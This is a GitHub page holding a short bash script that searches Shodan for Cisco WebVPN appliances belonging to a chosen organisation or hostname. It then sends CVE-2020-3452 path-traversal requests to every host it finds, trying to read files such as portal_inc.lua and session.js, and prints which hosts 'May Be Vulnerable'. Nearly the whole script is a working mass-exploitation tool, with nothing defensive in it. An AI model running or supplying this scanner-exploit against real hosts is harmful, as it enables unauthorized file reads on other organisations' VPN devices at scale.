-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathSnE-CVE-2020-3452.sh
25 lines (17 loc) · 2.47 KB
/
SnE-CVE-2020-3452.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/bin/bash
read -p "Give input like hostname:target.com or org:target > " orgz
mkdir -p shodan-output
echo -e "\n\e[93m[+]Total Targets Found On Shodan: \e[0m"
shodan count "set-cookie: webvpn;" $orgz
echo -e "\n\e[93m[+]Targets Details\e[0m"
shodan search --color --limit 1000 --fields ip_str,port,hostnames,org "set-cookie: webvpn;" $orgz | tee cvetmp.txt
cat cvetmp.txt | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sed -r 's/\s+//g' | sed '/^$/d' > shodan-output/shodan-output.txt
rm cvetmp.txt
echo -e "\n\e[93m[+]Exploiting The Targets Part-1\e[0m\n"
while IFS= read -r tar; do echo -e "===================================================" && echo "$tar" && if curl -s "https://$tar/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" -k -1 | if grep 'Bad Request' &> /dev/null; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"; fi; then echo ""; fi ; done < shodan-output/shodan-output.txt
echo -e "\n\e[93m[+]Exploiting The Targets Part-2\e[0m\n"
while IFS= read -r tar; do echo -e "-----------------------------------------------------" && echo "$tar" && if curl -s "https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" -k -1 | if grep 'Bad Request' &> /dev/null; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"; fi; then echo ""; fi ; done < shodan-output/shodan-output.txt
echo -e "\n\e[93m[+]Exploiting The Targets Part-3\e[0m\n"
while IFS= read -r tar; do echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" && echo "$tar" && if curl -ks "https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../" -1 --output session.js && if cat session.js | grep 'Bad Request'; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../"; fi; then rm -rf *.js; fi ; done < shodan-output/shodan-output.txt
echo -e "\n\e[92mFollow Me On\e[0m" "\e[34mTwitter\e[0m" "\e[5m\e[93m@darklotuskdb\e[0m" "\e[92mHappy Hacking\e[0m"
echo -e "\n\e[1mGood Day\e[0m\n"